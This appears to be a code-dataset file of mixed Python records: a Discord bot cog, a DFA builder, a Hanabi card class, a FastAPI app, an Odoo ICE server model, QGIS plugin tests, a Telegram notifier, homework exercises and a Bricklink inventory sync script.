+{"seq_id":"36642918372","text":"\"\"\"\nMisc\n\"\"\"\n\nfrom discord import Embed, User, Color\nfrom discord.ext.commands import Cog, command, Context\n\nfrom models.bot_model import CustomBot\n\nclass Other(Cog):\n \"\"\"\n Bot other commands cog\n \"\"\"\n\n def __init__(self, bot: CustomBot):\n self.bot = bot\n\n @command(description='Xem độ trễ của bot')\n async def ping(self, ctx: Context):\n \"\"\"\n Check bot ping\n \"\"\"\n await ctx.send(f'\\U0001f3d3 Pong! `{round(self.bot.latency * 1000)}ms`')\n\n @command(aliases=['av', 'avt'], description='Xem avatar của 1 user nào đó')\n async def avatar(self, ctx: Context, user: User = None):\n \"\"\"\n Get user avatar\n \"\"\"\n\n if user is None:\n user = ctx.author\n embed = Embed(\n title=f\"{user}'s avatar\",\n colour=Color.random()\n ).set_image(\n url=user.display_avatar.url\n )\n await ctx.send(embed=embed)\n\n # @avatar.error\n # async def avatar_e(self, ctx: Context, error):\n # if isinstance(error, UserNotFound):\n # return await ctx.reply('Không tìm thấy user này')\n # raise error\n\n\nasync def setup(bot: CustomBot):\n \"\"\"\n Run at setup\n \"\"\"\n\n await bot.add_cog(Other(bot))\n","repo_name":"tobycm/ayato","sub_path":"cogs/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"75071604070","text":"\"\"\"\nThis code returns a DFA that is equivalent to the Tree constructed by compressing all the traces into one tree.\n\"\"\"\n\nimport read_traces, DFA_utils_tree_only, time, tree_utils\n\n\ndef solve_tree_only(g_pos, G, Sigma, T, timeout, info, be_quiet=False):\n\tassert g_pos in G, f\"Error, g_pos not in G\"\n\n\t# creating the auxiliary tree structure\n\ttree = tree_utils.create_tree(g_pos, G, Sigma, T, prune=False)\n\tnodes = tree_utils.get_reachable_nodes(tree)\n\n\t# creating an equivalent DFA\n\tq_0 = 0\n\tq_pos = 1\n\tq_neg = 2\n\n\t# assigning ids to each node\n\tn_current = 3\n\tfor n in nodes:\n\t\tif n.is_root():\n\t\t\tn.assign_id(q_0)\n\t\telif n.is_positive_node():\n\t\t\tn.assign_id(q_pos)\n\t\telif n.is_negative_node():\n\t\t\tn.assign_id(q_neg)\n\t\telse:\n\t\t\tn.assign_id(n_current)\n\t\t\tn_current += 1\n\n\t# creating the dfa\n\tdfa = {}\n\tfor ni in nodes:\n\t\tif ni.is_terminal():\n\t\t\tcontinue\n\t\tni_id = ni.get_id()\n\t\tfor nj in ni.get_children():\n\t\t\tnj_id = nj.get_id()\n\t\t\tni_sigma = nj.get_psigma()\n\t\t\tdfa[(ni_id,ni_sigma)] = nj_id\n\tDFA_utils_tree_only.clean_dfa(q_0, dfa, T)\n\n\t# Adding the probabilities\n\tpos_prob = DFA_utils_tree_only.add_probabilities(q_0, dfa, T, g_pos)\n\n\treturn q_0, dfa, pos_prob\n","repo_name":"andrewli77/DISC","sub_path":"tree_only.py","file_name":"tree_only.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"}
+{"seq_id":"72221640229","text":"from __future__ import print_function\nfrom __future__ import division\n\nimport random\nimport math\nfrom collections import deque\nimport numpy as np \nimport matplotlib.pyplot as plt\n\nfrom const import COL_TO_IND\nfrom const import IND_TO_COL\n\nclass card(object): \n\t\n\tdef __init__(self, value, color, k_val, k_col): \n\t\tself.value = value \n\t\tself.color = color \n\n\t\tself.know_val = k_val\n\t\tself.know_col = k_col\n\n\t\tself.name = IND_TO_COL[self.color] + \" \" + str(self.value)\n\t\tself.know_name = self.get_name()\n\n\t# sets either the color or value boolean to true\n\tdef know(self, which): \n\t\tif which == 'value': \n\t\t\tself.know_val = True\n\t\telif which == 'color': \n\t\t\tself.know_col = True\n\t\tself.know_name = self.get_name()\n\n\t# returns what we know about the card based on what's been hinted\n\tdef get_name(self): \n\t\tif self.know_val == True and self.know_col == False: \n\t\t\treturn str(self.value)\n\t\tif self.know_val == True and self.know_col == True: \n\t\t\treturn IND_TO_COL[self.color] + \" \" + str(self.value)\n\t\tif self.know_val == False and self.know_col == True: \n\t\t\treturn IND_TO_COL[self.color]\n\t\telse: \n\t\t\treturn \"\"\n\n\n#===============================================================================\n# Helper Functions\n#===============================================================================\n\n\n","repo_name":"audhuang/hanabi_ai","sub_path":"hanabi/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"6132217454","text":"from fastapi import FastAPI, APIRouter\r\n\r\nfrom services import get_channels, get_packages, post_package, home\r\n\r\napp = FastAPI(\r\n title='DTH CHANNELS',\r\n description='Displays channels list and provides provision to add or modify channels packages',\r\n openapi_url=f'/openapi.json',\r\n redoc_url=f'/redoc'\r\n)\r\n\r\nrouter = APIRouter()\r\n\r\napp.include_router(home.router)\r\napp.include_router(get_channels.router)\r\napp.include_router(post_package.router)\r\napp.include_router(get_packages.router)\r\n\r\nif __name__ == \"__main__\":\r\n import uvicorn\r\n app.debug = True\r\n uvicorn.run(\r\n app=app,\r\n debug=app.debug\r\n )","repo_name":"vaidehi-nalmas/simple_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71214412709","text":"#!/usr/bin/env python3\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def inorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n if not root:\n return []\n nodes_values = []\n\n def traverseHelper(tree_node):\n if not tree_node:\n return\n traverseHelper(tree_node.left)\n nodes_values.append(tree_node.val)\n traverseHelper(tree_node.right)\n traverseHelper(root)\n return nodes_values;\n","repo_name":"codeme254/2023-code_surgery","sub_path":"0x16-binary_tree_inorder_traversal/optimized_solution1.py","file_name":"optimized_solution1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"33903005235","text":"from odoo import fields, models\nfrom odoo.addons.mail.tools.discuss import get_twilio_credentials\nimport requests\n\n\nclass MailIceServer(models.Model):\n _name = 'mail.ice.server'\n _description = 'ICE server'\n\n server_type = fields.Selection([('stun', 'stun:'), ('turn', 'turn:')], string='Type', required=True, default='stun')\n uri = fields.Char('URI', required=True)\n username = fields.Char()\n credential = fields.Char()\n\n def _get_local_ice_servers(self):\n \"\"\"\n :return: List of up to 5 dict, each of which representing a stun or turn server\n \"\"\"\n # firefox has a hard cap of 5 ice servers\n ice_servers = self.sudo().search([], limit=5)\n formatted_ice_servers = []\n for ice_server in ice_servers:\n formatted_ice_server = {\n 'urls': '%s:%s' % (ice_server.server_type, ice_server.uri),\n }\n if ice_server.username:\n formatted_ice_server['username'] = ice_server.username\n if ice_server.credential:\n formatted_ice_server['credential'] = ice_server.credential\n formatted_ice_servers.append(formatted_ice_server)\n return formatted_ice_servers\n\n def _get_ice_servers(self):\n \"\"\"\n :return: List of dict, each of which representing a stun or turn server,\n formatted as expected by the specifications of RTCConfiguration.iceServers\n \"\"\"\n if self.env['ir.config_parameter'].sudo().get_param('mail.use_twilio_rtc_servers'):\n (account_sid, auth_token) = get_twilio_credentials(self.env)\n if account_sid and auth_token:\n url = f'https://api.twilio.com/2010-04-01/Accounts/{account_sid}/Tokens.json'\n response = requests.post(url, auth=(account_sid, auth_token), timeout=60)\n if response.ok:\n response_content = response.json()\n if response_content:\n return response_content['ice_servers']\n return self._get_local_ice_servers()\n","repo_name":"odoo/odoo","sub_path":"addons/mail/models/mail_ice_server.py","file_name":"mail_ice_server.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
+{"seq_id":"15660027794","text":"from typing import TYPE_CHECKING, Callable, Optional\nfrom unittest.mock import MagicMock\n\nimport pytest\nfrom pytest_mock import MockerFixture\nfrom pytest_qgis import QgisInterface, QgsMapCanvas\nfrom qgis.core import (\n QgsAnnotationLayer,\n QgsFeature,\n QgsGeometry,\n QgsLineString,\n QgsPointLocator,\n QgsPointXY,\n QgsProject,\n QgsVectorLayer,\n)\nfrom qgis.gui import QgsMapMouseEvent, QgsMapToolIdentify\nfrom qgis.PyQt.QtCore import QEvent, QPoint, Qt\nfrom qgis.PyQt.QtGui import QKeyEvent\nfrom segment_reshape.geometry import reshape\nfrom segment_reshape.map_tool.segment_reshape_tool import SegmentReshapeTool, ToolMode\n\nif TYPE_CHECKING:\n from typing import Protocol\n\n class MouseEventFactoryType(Protocol):\n def __call__(\n self,\n location: QgsPointXY,\n mouse_event_type: QEvent.Type,\n mouse_button: Optional[Qt.MouseButton] = Qt.NoButton,\n ) -> QgsMapMouseEvent:\n ...\n\n\nMOUSE_LOCATION = QgsPointXY(1.5, 1.5)\n\n\n@pytest.fixture()\ndef mouse_event_factory(\n qgis_canvas: QgsMapCanvas,\n) -> \"MouseEventFactoryType\":\n def mouse_event_for_location(\n location: QgsPointXY,\n mouse_event_type: QEvent.Type,\n mouse_button: Optional[Qt.MouseButton] = None,\n ) -> QgsMapMouseEvent:\n mouse_button = mouse_button or Qt.NoButton\n event = QgsMapMouseEvent(\n qgis_canvas,\n mouse_event_type,\n QPoint(0, 0),\n mouse_button,\n )\n event.mapPoint = lambda: location # type: ignore[method-assign]\n event.mapPointMatch = lambda: QgsPointLocator.Match() # type: ignore[method-assign]\n return event\n\n return mouse_event_for_location\n\n\n@pytest.fixture()\ndef _add_layer(\n qgis_canvas: QgsMapCanvas,\n) -> None:\n layer = QgsAnnotationLayer(\n \"test\",\n QgsAnnotationLayer.LayerOptions(QgsProject.instance().transformContext()),\n )\n QgsProject.instance().addMapLayers([layer])\n qgis_canvas.setLayers([layer])\n qgis_canvas.setCurrentLayer(layer)\n\n\ndef _create_identify_result(\n identified_features: list[tuple[QgsFeature, QgsVectorLayer]]\n) -> list[QgsMapToolIdentify.IdentifyResult]:\n results = []\n\n for feature, layer in identified_features:\n # using the actual QgsMapToolIdentify.IdentifyResult causes\n # fatal exceptions, mock probably is sufficient for testing\n results.append(\n MagicMock(**{\"mLayer\": layer, \"mFeature\": feature}) # noqa: PIE804\n )\n\n return results\n\n\n@pytest.fixture()\ndef map_tool(qgis_canvas: QgsMapCanvas, qgis_new_project: None) -> SegmentReshapeTool:\n tool = SegmentReshapeTool(qgis_canvas)\n qgis_canvas.setMapTool(tool)\n return tool\n\n\ndef test_change_to_pick_location_mode_resets_rubberbands(map_tool: SegmentReshapeTool):\n map_tool._change_to_reshape_mode_for_geom(\n QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n )\n\n map_tool._change_to_pick_location_mode()\n\n assert map_tool._tool_mode == ToolMode.PICK_SEGMENT\n assert map_tool.old_segment_rubber_band.asGeometry().isEmpty()\n assert map_tool.start_point_indicator_rubber_band.asGeometry().isEmpty()\n\n\ndef test_pressing_esc_in_reshape_mode_aborts_reshape(map_tool: SegmentReshapeTool):\n map_tool._change_to_reshape_mode_for_geom(\n QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1, 2 2, 3 3, 4 4, 5 5)\"), None\n )\n assert map_tool._tool_mode == ToolMode.RESHAPE\n\n escape_press = QKeyEvent(QEvent.KeyPress, Qt.Key_Escape, Qt.NoModifier)\n map_tool.keyPressEvent(escape_press)\n\n assert map_tool._tool_mode == ToolMode.PICK_SEGMENT\n assert map_tool.old_segment_rubber_band.asGeometry().isEmpty()\n assert 
map_tool.start_point_indicator_rubber_band.asGeometry().isEmpty()\n\n\ndef test_change_to_change_to_reshape_mode_toggles_pick_mode_off(\n map_tool: SegmentReshapeTool,\n):\n map_tool._tool_mode = ToolMode.PICK_SEGMENT\n\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n assert map_tool._tool_mode == ToolMode.RESHAPE\n\n\ndef test_left_mouse_click_in_pick_mode_does_nothing_if_active_layer_or_feature_not_found(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n map_tool._change_to_pick_location_mode()\n m_find_common_segment = mocker.patch.object(\n map_tool, \"_find_common_segment\", return_value=(None, None), autospec=True\n )\n\n map_release = mouse_event_factory(\n MOUSE_LOCATION,\n QEvent.MouseButtonRelease,\n Qt.LeftButton,\n )\n map_tool.canvasReleaseEvent(map_release)\n\n m_find_common_segment.assert_called_once()\n assert map_tool._tool_mode == ToolMode.PICK_SEGMENT\n\n\ndef test_left_mouse_click_in_pick_mode_does_nothing_if_common_segment_not_found(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n map_tool._change_to_pick_location_mode()\n\n m_find_common_segment = mocker.patch.object(\n map_tool,\n \"_find_common_segment\",\n return_value=(None, QgsVectorLayer(\"test\")),\n autospec=True,\n )\n\n map_release = mouse_event_factory(\n MOUSE_LOCATION,\n QEvent.MouseButtonRelease,\n Qt.LeftButton,\n )\n map_tool.canvasReleaseEvent(map_release)\n\n m_find_common_segment.assert_called_once()\n\n assert map_tool._tool_mode == ToolMode.PICK_SEGMENT\n\n\ndef test_left_mouse_click_in_pick_mode_starts_reshape_mode_if_common_segment_is_found(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n map_tool._change_to_pick_location_mode()\n assert map_tool.old_segment_rubber_band.asGeometry().isEmpty()\n assert map_tool.start_point_indicator_rubber_band.asGeometry().isEmpty()\n\n m_find_common_segment = mocker.patch.object(\n map_tool,\n \"_find_common_segment\",\n return_value=(QgsLineString([(0, 0), (1, 1)]), QgsVectorLayer(\"test\")),\n autospec=True,\n )\n\n map_release = mouse_event_factory(\n MOUSE_LOCATION,\n QEvent.MouseButtonRelease,\n Qt.LeftButton,\n )\n map_tool.canvasReleaseEvent(map_release)\n\n m_find_common_segment.assert_called_once()\n\n assert map_tool._tool_mode == ToolMode.RESHAPE\n\n assert map_tool.old_segment_rubber_band.asGeometry().isGeosEqual(\n QgsGeometry.fromWkt(\"LineString (0 0, 1 1)\")\n )\n assert (\n map_tool.start_point_indicator_rubber_band.asGeometry().asWkt()\n == \"LineString (0 0, 0 0)\"\n )\n\n\n@pytest.mark.usefixtures(\"_add_layer\")\ndef test_left_mouse_click_in_reshape_mode_adds_points_to_maptool(\n mocker: MockerFixture,\n qgis_canvas: QgsMapCanvas,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n m_make_reshape_edits = mocker.patch.object(\n reshape, \"make_reshape_edits\", autospec=True\n )\n\n map_tool = SegmentReshapeTool(qgis_canvas)\n qgis_canvas.setMapTool(map_tool)\n\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n map_release = mouse_event_factory(\n MOUSE_LOCATION,\n QEvent.MouseButtonRelease,\n Qt.LeftButton,\n )\n map_tool.canvasReleaseEvent(map_release)\n\n assert map_tool.captureCurve().curveToLine().asWkt() == \"LineString (1.5 1.5)\"\n\n 
m_make_reshape_edits.assert_not_called()\n\n\n@pytest.mark.usefixtures(\"_add_layer\")\n@pytest.mark.parametrize(\n (\"points_to_remove\", \"expected_new\"),\n [\n (1, \"LineString (0 0, 1 1)\"),\n (2, \"LineString (0 0)\"),\n (3, \"LineString EMPTY\"),\n (6, \"LineString EMPTY\"),\n ],\n ids=[\n \"undo-few-last\",\n \"undo-so-that-one-left\",\n \"undo-first-point_temp-should-change-to-old_geom-start\",\n \"undo-when-no-points-left_temp-should-change-to-old_geom-start\",\n ],\n)\ndef test_undo_add_vertex_should_update_new(\n # map_tool: SegmentReshapeTool,\n qgis_canvas: QgsMapCanvas,\n mouse_event_factory: \"MouseEventFactoryType\",\n points_to_remove: int,\n expected_new: str,\n):\n map_tool = SegmentReshapeTool(qgis_canvas)\n qgis_canvas.setMapTool(map_tool)\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(1 0, 2 0, 3 0)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n # Add new line\n for new_point in [(0, 0), (1, 1), (2, 2)]:\n map_tool.addVertex(QgsPointXY(*new_point))\n\n assert map_tool.captureCurve().curveToLine().asWkt() == \"LineString (0 0, 1 1, 2 2)\"\n\n # Undo n times\n undo_key_event = QKeyEvent(QEvent.KeyPress, Qt.Key_Backspace, Qt.NoModifier)\n for _ in range(points_to_remove):\n map_tool.keyPressEvent(undo_key_event)\n\n assert map_tool._tool_mode == ToolMode.RESHAPE\n assert map_tool.captureCurve().curveToLine().asWkt() == expected_new\n assert map_tool.old_segment_rubber_band.asGeometry().asWkt() == old_geom.asWkt()\n\n\ndef test_start_point_indicator_rubberband(\n # map_tool: SegmentReshapeTool,\n qgis_canvas: QgsMapCanvas,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n map_tool = SegmentReshapeTool(qgis_canvas)\n qgis_canvas.setMapTool(map_tool)\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(1 0, 2 0, 3 0)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n # Move cursor to move temp rubberband end point\n mouse_move_event = mouse_event_factory(QgsPointXY(2, 3), QEvent.MouseMove)\n map_tool.canvasMoveEvent(mouse_move_event)\n\n assert map_tool.start_point_indicator_rubber_band.isVisible()\n assert (\n map_tool.start_point_indicator_rubber_band.asGeometry().asWkt()\n == \"LineString (1 0, 2 3)\"\n )\n\n map_tool.addVertex(QgsPointXY(1, 1))\n\n assert not map_tool.start_point_indicator_rubber_band.isVisible()\n\n undo_key_event = QKeyEvent(QEvent.KeyPress, Qt.Key_Backspace, Qt.NoModifier)\n map_tool.keyPressEvent(undo_key_event)\n\n mouse_move_event = mouse_event_factory(QgsPointXY(4, 3), QEvent.MouseMove)\n map_tool.canvasMoveEvent(mouse_move_event)\n assert map_tool.start_point_indicator_rubber_band.isVisible()\n assert (\n map_tool.start_point_indicator_rubber_band.asGeometry().asWkt()\n == \"LineString (1 0, 4 3)\"\n )\n\n\ndef test_right_mouse_click_in_reshape_mode_changes_only_to_pick_mode_if_edited_geometry_is_empty(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n m_change_to_pick_location_mode = mocker.patch.object(\n map_tool, \"_change_to_pick_location_mode\", autospec=True\n )\n\n m_make_reshape_edits = mocker.patch.object(\n reshape, \"make_reshape_edits\", autospec=True\n )\n\n right_click = mouse_event_factory(\n QgsPointXY(1, 1), QEvent.MouseButtonRelease, Qt.RightButton\n )\n map_tool.cadCanvasReleaseEvent(right_click)\n\n m_change_to_pick_location_mode.assert_called_once()\n m_make_reshape_edits.assert_not_called()\n\n\ndef 
test_right_mouse_click_in_reshape_mode_calls_reshape_if_edited_geometry_is_not_empty(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n m_change_to_pick_location_mode = mocker.patch.object(\n map_tool, \"_change_to_pick_location_mode\", autospec=True\n )\n m_make_reshape_edits = mocker.patch.object(\n reshape, \"make_reshape_edits\", autospec=True\n )\n\n left_click = mouse_event_factory(\n QgsPointXY(1, 1), QEvent.MouseButtonRelease, Qt.LeftButton\n )\n # Add point to rubberband\n map_tool.canvasReleaseEvent(left_click)\n\n # Test\n right_click = mouse_event_factory(\n QgsPointXY(1, 1), QEvent.MouseButtonRelease, Qt.RightButton\n )\n map_tool.cadCanvasReleaseEvent(right_click)\n\n m_change_to_pick_location_mode.assert_called_once()\n m_make_reshape_edits.assert_called_once()\n\n\n@pytest.mark.usefixtures(\"_use_topological_editing\")\ndef test_find_common_segment_should_return_shared_segment(\n qgis_iface: QgisInterface,\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n preset_features_layer_factory: Callable[\n [str, list[str]], tuple[QgsVectorLayer, list[QgsFeature]]\n ],\n):\n layer, (base_feature, *_) = preset_features_layer_factory(\n \"l1\",\n [\n \"LINESTRING(0 0, 1 1, 2 2, 3 3)\", # base\n \"LINESTRING(1 0, 1 1, 2 2, 2 0)\", # partly common\n \"LINESTRING(0 2, 2 2, 1 1, 0 1)\", # partly common reversed\n \"LINESTRING(0 0, 1 1)\", # edge start\n \"LINESTRING(2 2, 3 3)\", # edge end\n ],\n )\n\n QgsProject.instance().addMapLayer(layer)\n qgis_iface.setActiveLayer(layer)\n\n results = _create_identify_result(\n [\n (feature, layer)\n for feature in layer.getFeatures()\n if feature.id() != base_feature.id()\n ]\n )\n mocker.patch.object(QgsMapToolIdentify, \"identify\", return_value=results)\n\n segment, segment_layer = map_tool._find_common_segment(MOUSE_LOCATION)\n\n assert segment_layer == layer\n\n assert QgsGeometry(segment).isGeosEqual(QgsGeometry.fromWkt(\"LINESTRING(1 1, 2 2)\"))\n","repo_name":"nlsfi/segment-reshape-qgis-plugin","sub_path":"test/map_tool/test_segment_reshape_tool.py","file_name":"test_segment_reshape_tool.py","file_ext":"py","file_size_in_byte":13332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"10312988363","text":"import asyncio\nfrom telegram import Bot\nfrom config import TELEGRAM_TOKEN, CHAT_ID\n\n\ndef send_scopes(data_items):\n bot = Bot(token=TELEGRAM_TOKEN)\n # نمایش دادههای جدید و جداول متناظر با آنها\n for table_name, data in data_items:\n if data:\n message = f\"New Data for Table '{table_name}': {data}\"\n print(message)\n\n # ارسال پیام به تلگرام\n loop = asyncio.get_event_loop()\n loop.run_until_complete(bot.send_message(chat_id=CHAT_ID, text=message))\n","repo_name":"SShiravy/Sobi_hackerOne_bot","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40148924395","text":"# 1\n# Напишите программу которая сложит все числа в заданном списке\n# выведет результат в консоль\nnums1 = [5, 6, 92, 47, 12, -18, 33, 8];\n\n\n# 2\n# Напишите программу которая добавит в список edited_names словари\n# с двумя парами { \"name\": \"имя с большой буквы\", \"nameLength\": \"длина имени\"}\nnames = ['jack', 'sarah', 'mary', 'joey', 'chris', 'samantha'];\nedited_names = [];\n\n\n\n# 3\n# Напишите программу которая в список edited_nums добавит словари\n# с тремя парами { \"number\": \"само число\", \"square\": \"число в квадрпате\", \"cube\": \"число в кубе\"}\nnums2 = [1, 2, 3, 4, 5, 6, 7, 8, 9];\nedited_nums = [];\n\n\n# 4\n# напишите программу которая выводит в консоль сумму всех\n# четных чисел в списке\n\nnums_list = [1, 12, 34, 71, 14, 12, 33, 70, 82, 81, 9, 19, 90];\n\n\n# 5\n# напишите программу которая проанализирует данный список и выведет в консоль самую длинную строку\n\nsome_strings = ['Star', 'Planet', 'Comet', 'Interstellar', 'Space'];\n\n# 6\n# напишите программу которая возьмёт из данного списка наименования книг которые вышли в этом году\n# и добавит их в новый список\n\nbooks = [\n {\n 'author': 'Jeremy Brook',\n 'title': 'My childhood',\n 'release': 2023\n },\n {\n 'author': 'Samantha Jhones',\n 'title': 'Living with ten cats',\n 'release': 2020\n },\n {\n 'author': 'Bob Summers',\n 'title': 'Exploring far space',\n 'release': 2021\n },\n {\n 'author': 'Bill Brown',\n 'title': 'Insects in our garden',\n 'release': 2023\n },\n {\n 'author': 'Jessica Love',\n 'title': 'Programming for begginers',\n 'release': 2023\n }\n];\n\n\n# 7\n# Напишите функцию которая будет принимать два аргумента (start, end)\n# Для каждого числа в диапозоне от start до end будет выводить число\n# И Четное оно Или нечетное\n","repo_name":"GammaIntelligenceTraining/Python13","sub_path":"102_homeworks/001_list_dictionary/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14608630536","text":"\"\"\"\nCommand that should run:\n - When the SYNC activity starts in order to make sure the local items are present in the remote Bricklink's store before\n issuing the delta updates when the orders are received.\n - Periodically (e.g. every hour), to push possible price changes and, in general, ensure correct synchronization.\n\nGet the differences between the local and the remote Bricklink store and upload the differences to the Bricklink store to ensure\nit has *at least* the local inventory items.\n\"\"\"\n\n\nimport asyncio\nfrom backends.bricklink import Bricklink, parse_bricklink_item_type, to_bricklink_item_type\nfrom backends.bricklink_types import StoreInventory\nfrom db import Session\nfrom models import InventoryItem\nfrom math import ceil\nfrom typing import List, Optional\nimport time\nfrom datetime import datetime\n\n\nMAX_ELAPSED_TIME = 40 * 60 # 40 minutes\nBATCH_SIZE = 100\n\n\nbricklink = Bricklink.from_supervisor()\n\n\ndef match_remote_inventory_item(inventory_item: InventoryItem, remote_inventory_item: StoreInventory) -> bool:\n does_match = True\n does_match &= inventory_item.item_id == remote_inventory_item['item']['no']\n does_match &= inventory_item.item_type == parse_bricklink_item_type(remote_inventory_item['item']['type'])\n does_match &= inventory_item.color_id == remote_inventory_item['color_id']\n does_match &= inventory_item.condition == remote_inventory_item['new_or_used']\n does_match &= inventory_item.user_remarks == remote_inventory_item['remarks']\n return does_match\n\n\nasync def search_item_in_remote_inventory_batch(inventory_item: InventoryItem, remote_inventory_batch: List[StoreInventory]) -> Optional[StoreInventory]:\n for remote_inventory_item in remote_inventory_batch:\n if match_remote_inventory_item(inventory_item, remote_inventory_item):\n return remote_inventory_item\n return None\n\n\ndef is_different(inventory_item: InventoryItem, remote_inventory_item: StoreInventory):\n result = False\n result |= inventory_item.unit_price != remote_inventory_item['unit_price']\n result |= inventory_item.quantity != remote_inventory_item['quantity']\n result |= inventory_item.user_description != remote_inventory_item['description']\n return result\n\n\ndef create_inventory_item(inventory_item: InventoryItem):\n # https://www.bricklink.com/v3/api.page?page=create-inventory\n bricklink.create_store_inventories(store_inventory_resources=[{\n 'item': {\n 'no': inventory_item.item_id,\n 'type': to_bricklink_item_type(inventory_item.item_type),\n },\n 'color_id': inventory_item.color_id,\n 'quantity': inventory_item.quantity,\n 'unit_price': 1.0,#inventory_item.unit_price,\n 'new_or_used': inventory_item.condition,\n 'completeness': None,\n 'description': inventory_item.user_description,\n 'remarks': inventory_item.user_remarks,\n 'bulk': None,\n 'is_retain': False,\n 'is_stock_room': False,\n 'my_cost': None,\n 'sale_rate': None,\n 'tier_quantity1': None,\n 'tier_quantity2': None,\n 'tier_quantity3': None,\n 'tier_price1': None,\n 'tier_price2': None,\n 'tier_price3': None,\n }])\n\n\ndef update_inventory_item(inventory_item: InventoryItem, remote_item_id: int):\n # https://www.bricklink.com/v3/api.page?page=update-inventory\n bricklink.update_store_inventory(remote_item_id, store_inventory_resource={\n 'quantity': inventory_item.quantity,\n 'description': inventory_item.user_description,\n 'remarks': inventory_item.user_remarks,\n 'bulk': None,\n 'is_retain': False,\n 'is_stock_room': False,\n 'stock_room_id': None,\n 
'my_cost': None,\n 'sale_rate': None,\n 'tier_quantity1': None,\n 'tier_quantity2': None,\n 'tier_quantity3': None,\n 'tier_price1': None,\n 'tier_price2': None,\n 'tier_price3': None,\n })\n\n\nasync def run():\n started_at = time.time()\n\n remote_inventory = bricklink.get_store_inventories()\n\n session = Session()\n inventory_items: List[InventoryItem] = \\\n session.query(InventoryItem) \\\n .order_by(InventoryItem.bl_synced_at.asc()) \\\n .all()\n\n for item in inventory_items:\n if (time.time() - started_at) >= MAX_ELAPSED_TIME:\n print(f\"Max elapsed time reached\")\n return\n\n print(f\"Item {item.item_id} ({item.item_type}) {item.color.name}\", end='')\n\n if not item.is_valid_for_bricklink():\n print(f\" -> NOT SYNCABLE\")\n continue\n\n matching_remote_items: List[Optional[StoreInventory]] = \\\n await asyncio.gather(*[\n search_item_in_remote_inventory_batch(item, remote_inventory[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])\n for i in range(0, ceil(len(remote_inventory) / BATCH_SIZE))\n ])\n \n matching_remote_items = [ item for item in matching_remote_items if item ]\n\n if len(matching_remote_items) == 0:\n # There's no remote item that matches local inventory item, therefore we need to CREATE IT\n\n print(f\" -> CREATE\")\n\n create_inventory_item(item)\n else:\n # If more than a remote item matches (e.g. different description), keep the item whose inventory_id is less\n matching_remote_items.sort(key=lambda x: x['inventory_id'])\n matching_remote_item: StoreInventory = matching_remote_items[0]\n\n if is_different(item, matching_remote_item):\n # If the local item is considered to be different from remote, issue an UPDATE\n\n print(f\" -> UPDATE (\"\n f\"quantity: {item.quantity}/{matching_remote_item['quantity']}, \"\n f\"unit_price: {item.unit_price}/{matching_remote_item['unit_price']}, \"\n f\"user_description: \\\"{item.user_description}\\\"/\\\"{matching_remote_item['description']}\\\"\"\n \")\")\n\n update_inventory_item(item, matching_remote_item['inventory_id'])\n else:\n print('') # Nothing to do!\n \n item.bl_synced_at = datetime.now()\n","repo_name":"loryruta/brick-scraper","sub_path":"src/commands/sync_bricklink_store.py","file_name":"sync_bricklink_store.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
